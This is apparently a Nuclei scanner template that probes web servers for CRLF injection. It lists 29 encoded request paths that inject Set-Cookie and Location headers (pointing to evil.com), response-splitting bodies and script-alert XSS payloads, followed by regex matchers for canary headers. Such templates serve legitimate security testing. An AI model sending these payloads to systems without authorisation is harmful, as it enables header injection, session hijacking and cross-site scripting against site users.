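id: crlf-injection-extended

info:
  name: CRLF Injection Extended Detection
  author: coffin
  severity: high
  description: Detects a wide range of CRLF injection vectors that can be exploited for header injection, response splitting, and XSS.
  reference:
    - https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
  tags: crlf, header-injection, response-splitting, xss
  metadata:
    # One GET per path below (29 paths). Keep this in sync when the list
    # changes; the original value (5) did not reflect the real request count.
    max-request: 29

http:
  - method: GET
    path:
      # Canary headers the matchers look for: "Set-Cookie: coffin=hi",
      # "Location: [www.]evil.com" and "coffin-x: coffin-x". A finding is only
      # raised when one of them is reflected in the *response headers*, i.e.
      # when the CR/LF (or its encoded/unicode variant) actually terminated
      # the request line and was passed through to the response.
      - "{{BaseURL}}/%%0a0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi"
      # Nuclei does not follow redirects unless `redirects: true` is set, so an
      # injected Location is observed in the header, not followed.
      - "{{BaseURL}}/%0d%0aLocation: http://evil.com"
      # NOTE(review): the next four paths (Content-Length / X-XSS-Protection /
      # Content-Type / inline script, no canary header) cannot produce a hit
      # with the matchers below; they only add requests. Either drop them or
      # append "%0d%0acoffin-x:coffin-x" before the header terminator so the
      # header matcher can observe the injection. Kept for parity with upstream.
      - "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23"
      - "{{BaseURL}}/%0d%0a%0d%0a<script>alert('XSS')</script>;"
      - "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e"
      - "{{BaseURL}}/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert('XSS');</script>"
      - "{{BaseURL}}/%0d%0aHost: {{Hostname}}%0d%0aCookie: coffin=hi%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: coffin=hi%0d%0a%0d%0a"
      - "{{BaseURL}}/%0d%0aLocation: www.evil.com"
      - "{{BaseURL}}/%0d%0aSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi"
      # NOTE(review): "Location:" here is immediately followed by CRLF, so the
      # Location matcher does not fire for this path either (see note above).
      - "{{BaseURL}}/%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<svg/onload=alert(document.domain)>"
      - "{{BaseURL}}/%23%0aSet-Cookie:coffin=hi"
      # Double-encoded LF (%25%30%61 -> %0a): catches one decode pass too many.
      - "{{BaseURL}}/%25%30%61Set-Cookie:coffin=hi"
      - "{{BaseURL}}/%2e%2e%2f%0d%0aSet-Cookie:coffin=hi"
      # NOTE(review): no canary header in this path; same caveat as above.
      - "{{BaseURL}}/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a<script>alert(document.cookie)</script>%2F../%2F..%2F..%2F..%2F../tr"
      - "{{BaseURL}}/%3f%0d%0aLocation:%0d%0acoffin-x:coffin-x%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<script>alert(document.domain)</script>"
      # Literal "\r" / "\r\n" / "\t" sequences (%5C = backslash) for backends
      # that unescape C-style sequences before building the response.
      - "{{BaseURL}}/%5Cr%20Set-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5Cr%5Cn%20Set-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:coffin%5Cr%5CtSet-Cookie:coffin=hi;"
      # U+560A / U+560D: UTF-8 sequences whose low byte is 0x0A / 0x0D once a
      # backend truncates the code point to a single byte.
      - "{{BaseURL}}/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%E5%98%8A%E5%98%8DLocation:www.evil.com"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ALocation:www.evil.com"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi;"
      # Non-standard %uXXXX encoding (IIS/ASP style).
      - "{{BaseURL}}/%u000ASet-Cookie:coffin=hi;"
      - "{{BaseURL}}/www.evil.com/%2E%2E%2F%0D%0ASet-Cookie:coffin=hi;"
      - "{{BaseURL}}/www.evil.com/%2F..%0D%0ASet-Cookie:coffin=hi;"

    # All paths are sent even after a hit, so the result lists every vector that
    # works. Set to true to minimise traffic against the target once one
    # injection has been confirmed.
    stop-at-first-match: false

    # Both a canary header AND an expected status code are required; the
    # status list keeps 4xx/5xx error pages that merely echo the path out of
    # the results.
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        condition: or
        regex:
          # Covers both Location payload forms used above ("http://evil.com"
          # and "www.evil.com"). The previous pattern required "www." and so
          # never matched the "Location: http://evil.com" payload.
          - '(?i)location\s*:\s*(?:https?:)?(?://)?(?:www\.)?evil\.com'
          - '(?i)set-cookie\s*:\s*coffin\s*=\s*hi'
          - '(?i)coffin-x\s*:\s*coffin-x'

      - type: status
        condition: or
        status:
          - 200
          - 201
          - 202
          - 204
          - 205
          - 206
          - 207
          - 301
          - 302
          - 307
          - 308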